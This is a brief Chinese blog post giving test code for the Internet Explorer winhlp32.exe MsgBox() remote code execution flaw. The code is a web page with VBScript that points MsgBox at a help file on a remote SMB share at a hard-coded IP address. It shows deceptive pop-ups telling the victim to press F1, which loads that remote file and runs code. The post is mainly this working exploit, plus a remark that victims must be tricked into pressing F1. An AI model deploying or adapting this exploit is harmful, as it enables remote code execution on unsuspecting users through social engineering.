Internet Explorer的’winhlp32.exe中’MsgBox()’远程执行代码漏洞
测试代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
<html> <script type="text/vbscript"> big = "\\184.73.14.110\PUBLIC\test.hlp" //For i=1 to 2500 // big = big & "\..\" //Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, 1 </script> </html> |
这个代码利用起来比较麻烦需要诱导别人按F1键才可以
HLP文件 msgbox_test_help
貌似国内的XX操作系统里边都没有帮助文件!
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!